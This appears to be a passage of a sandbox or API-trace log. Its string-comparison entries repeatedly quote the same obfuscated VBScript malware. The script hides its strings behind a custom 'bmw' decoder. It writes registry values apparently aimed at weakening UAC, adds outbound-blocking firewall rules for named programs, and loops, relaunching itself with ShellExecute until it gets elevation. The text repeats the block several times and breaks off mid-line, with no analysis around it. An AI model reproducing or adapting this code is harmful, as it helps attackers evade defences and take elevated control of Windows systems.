bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.349] wcsncmp (_String1=".enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 33 [0226.349] wcsncmp (_String1="enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.349] wcsncmp (_String1="nabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0226.349] wcsncmp (_String1="abled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0226.349] wcsncmp (_String1="bled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite 